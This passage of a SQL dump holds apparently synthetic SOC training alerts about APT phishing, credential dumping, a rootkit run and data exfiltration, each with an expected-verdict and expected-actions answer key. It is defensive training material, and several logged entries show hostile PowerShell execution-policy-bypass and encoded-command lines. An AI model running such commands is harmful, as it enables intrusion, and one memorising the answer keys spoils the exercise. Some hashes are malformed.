3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:45:00Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value Change\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"computer_name\\\":\\\"CompromisedHost01\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"HyperBro\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hyperbro.exe\\\\\\\"\\\",\\\"process_id\\\":5123,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_information\\\":{\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"destination_port\\\":80},\\\"file_hash\\\":\\\"b5a5b4c7f4e2c5d8a2b0e4c5a6b7c8d9\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.510Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:45:00Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value Change\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"computer_name\\\":\\\"CompromisedHost01\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"HyperBro\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hyperbro.exe\\\\\\\"\\\",\\\"process_id\\\":5123,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_information\\\":{\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"destination_port\\\":80},\\\"file_hash\\\":\\\"b5a5b4c7f4e2c5d8a2b0e4c5a6b7c8d9\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1195, 'Credential Dumping and Lateral Movement - Step 4', 'critical', 'Network monitoring and SIEM alerts', 'APT27 has successfully used harvested credentials to move laterally across the network. The attacker accessed a sensitive server containing military technology data using legitimate user credentials.', 'Credential Access and Lateral Movement', 'T1078: Valid Accounts, T1021: Remote Services', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T03:24:00Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.45\",\"attacker_ip\":\"203.0.113.54\",\"user\":\"jdoe\",\"action\":\"Successful login\",\"service\":\"RDP\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"passdump.exe\",\"domain\":\"internal.corp.local\",\"log_type\":\"Authentication Success\",\"additional_info\":{\"access_time\":\"3 seconds\",\"sensitive_data_flag\":true}}', '2026-02-07 21:23:28', '2026-02-15 04:20:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known APT27 command and control IP\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Associated with credential dumping tools\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Sensitive server housing military technology data\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials possibly 
compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1196, 'Exfiltration of Military Technology Data', 'critical', 'Data loss prevention (DLP) system alerts', 'APT27 successfully exfiltrated critical military technology data to an external server, achieving their objective of technology theft.', 'Data Exfiltration', 'T1020: Automated Exfiltration', 1, 'closed', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"10.0.0.25\",\"destination_ip\":\"203.0.113.45\",\"user\":\"j.doe\",\"file_name\":\"military_tech_blueprints.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"protocol\":\"HTTPS\",\"action\":\"File Transfer\",\"dlp_policy\":\"Sensitive Data Exfiltration\",\"result\":\"Allowed\",\"external_server_domain\":\"malicious-apt27.com\"}', '2026-02-07 21:23:28', '2026-02-16 00:45:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP used in data exfiltration event.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known APT27 command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"military_tech_blueprints.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"File matching sensitive data policy.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known APT27 malware.\"}},{\"id\":\"artifact_5\",\"type\":\"domain\",\"value\":\"malicious-apt27.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Domain used by APT27 for data 
exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.514Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"j.doe\\\",\\\"file_name\\\":\\\"military_tech_blueprints.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration\\\",\\\"result\\\":\\\"Allowed\\\",\\\"external_server_domain\\\":\\\"malicious-apt27.com\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.514Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"j.doe\\\",\\\"file_name\\\":\\\"military_tech_blueprints.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration\\\",\\\"result\\\":\\\"Allowed\\\",\\\"external_server_domain\\\":\\\"malicious-apt27.com\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.514Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"j.doe\\\",\\\"file_name\\\":\\\"military_tech_blueprints.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration\\\",\\\"result\\\":\\\"Allowed\\\",\\\"external_server_domain\\\":\\\"malicious-apt27.com\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.514Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"j.doe\\\",\\\"file_name\\\":\\\"military_tech_blueprints.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration\\\",\\\"result\\\":\\\"Allowed\\\",\\\"external_server_domain\\\":\\\"malicious-apt27.com\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.514Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"j.doe\\\",\\\"file_name\\\":\\\"military_tech_blueprints.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"dlp_policy\\\":\\\"Sensitive Data Exfiltration\\\",\\\"result\\\":\\\"Allowed\\\",\\\"external_server_domain\\\":\\\"malicious-apt27.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1197, 'Suspicious Access Attempt Detected', 'medium', 'Email security logs', 'A spear-phishing email was detected targeting NGO employees, containing a malicious link designed to harvest credentials. The email originated from an external IP address associated with known phishing activities.', 'Initial Access', 'T1566.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T08:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"email_from\":\"phishing@maliciousdomain.com\",\"email_to\":\"john.doe@ngo.org\",\"subject\":\"Urgent: Action Required\",\"attachment\":\"invoice.docx\",\"attachment_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"malicious_link\":\"http://maliciousdomain.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\"}', '2026-02-07 21:23:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"phishing@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Email address flagged for phishing activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash has been reported in phishing attachment analysis.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"URL is part of a credential harvesting 
campaign.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.515Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T08:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"email_from\\\":\\\"phishing@maliciousdomain.com\\\",\\\"email_to\\\":\\\"john.doe@ngo.org\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment\\\":\\\"invoice.docx\\\",\\\"attachment_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"malicious_link\\\":\\\"http://maliciousdomain.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.515Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T08:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"email_from\\\":\\\"phishing@maliciousdomain.com\\\",\\\"email_to\\\":\\\"john.doe@ngo.org\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment\\\":\\\"invoice.docx\\\",\\\"attachment_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"malicious_link\\\":\\\"http://maliciousdomain.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 
Safari/537.36\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.515Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T08:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"email_from\\\":\\\"phishing@maliciousdomain.com\\\",\\\"email_to\\\":\\\"john.doe@ngo.org\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment\\\":\\\"invoice.docx\\\",\\\"attachment_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"malicious_link\\\":\\\"http://maliciousdomain.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.515Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T08:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"email_from\\\":\\\"phishing@maliciousdomain.com\\\",\\\"email_to\\\":\\\"john.doe@ngo.org\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment\\\":\\\"invoice.docx\\\",\\\"attachment_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"malicious_link\\\":\\\"http://maliciousdomain.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.515Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T08:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"email_from\\\":\\\"phishing@maliciousdomain.com\\\",\\\"email_to\\\":\\\"john.doe@ngo.org\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment\\\":\\\"invoice.docx\\\",\\\"attachment_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"malicious_link\\\":\\\"http://maliciousdomain.com/login\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1198, 'Hikit Rootkit Execution Alert', 'high', 'Endpoint detection and response (EDR) systems', 'The alert indicates the deployment and execution of the Hikit rootkit, a sophisticated tool used by adversaries to maintain a stealthy presence on compromised systems. This activity was detected following initial access.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-17T12:34:56Z\",\"event_id\":\"4624\",\"user\":\"compromisedUser\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"process_name\":\"powershell.exe\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\hikit.exe\",\"hash\":\"f47ac10b-58cc-4372-a567-0e02b2c3d479\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Windows\\\\System32\\\\hikit.exe\",\"event_description\":\"A remote command execution was detected from an external IP address using PowerShell, deploying a known malicious rootkit.\"}', '2026-02-07 21:23:36', '2026-02-21 05:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"hikit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"File associated with Hikit rootkit.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f47ac10b-58cc-4372-a567-0e02b2c3d479\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to Hikit rootkit 
executable.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromisedUser\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1199, 'Unusual Data Exfiltration Activity', 'high', 'Network traffic analysis', 'The final phase involves Axiom exfiltrating sensitive information from the organization\'s databases, targeting documents related to human rights activities, and transferring the data to external servers under their control.', 'Exfiltration', 'T1041', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-03T14:32:00Z\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"human_rights_report_2023.docx\",\"user\":\"jdoe\",\"action\":\"exfiltrate\",\"status\":\"success\",\"bytes_transferred\":10485760}', '2026-02-07 21:23:36', '2026-02-21 08:08:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised machine.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration server used by cybercriminal group Axiom.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash associated with exfiltrated documents.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"human_rights_report_2023.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_database\",\"verdict\":\"sensitive\",\"details\":\"Sensitive document related to human rights activities.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_audit\",\"verdict\":\"internal\",\"details\":\"User account of the 
individual who initiated the exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1200, 'Spear Phishing Email Detected', 'medium', 'Email Security Gateway', 'APT17 initiates their operation with a spear phishing campaign, aiming to infiltrate the network by exploiting human vulnerabilities. A targeted email containing a malicious attachment was detected.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-04T08:37:45Z\",\"email_id\":\"e1b2c3d4-5678-9101-1121-314151617181\",\"from\":\"john.doe@compromised.com\",\"to\":\"victim@company.com\",\"subject\":\"Urgent: Review the attached document\",\"attachment\":\"Invoice_2023.docm\",\"attachment_hash\":\"f5c6e6b8a2b3c4d5f6e7g8h9i0j1k2l3\",\"sender_ip\":\"203.0.113.45\",\"recipient_ip\":\"192.168.10.15\",\"phishing_url\":\"http://malicious-link.com/secure-login\"}', '2026-02-07 21:24:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"john.doe@compromised.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known phishing email associated with APT17.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"f5c6e6b8a2b3c4d5f6e7g8h9i0j1k2l3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Document contains macro used for initial access.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for sending phishing emails.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-link.com/secure-login\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"URL used for credential phishing.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Email Detected\",\"date\":\"2026-02-08T19:00:02.518Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1201, 'Malicious Payload Execution', 'high', 'Endpoint Detection and Response (EDR)', 'Following successful phishing, APT17 executed a custom payload designed to bypass traditional antivirus solutions and establish control over the compromised system. The payload was detected executing on a Windows endpoint, aiming to establish a foothold within the network.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_type\":\"process\",\"host_ip\":\"192.168.1.45\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious.ps1\",\"file_hash\":\"fa26be19de6bff93f70bc2308434e4a440bbad02\",\"attacker_ip\":\"203.0.113.45\",\"filename\":\"malicious.ps1\",\"detected_by\":\"EDR\",\"threat_level\":\"high\"}', '2026-02-07 21:24:15', '2026-02-21 03:16:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP linked to 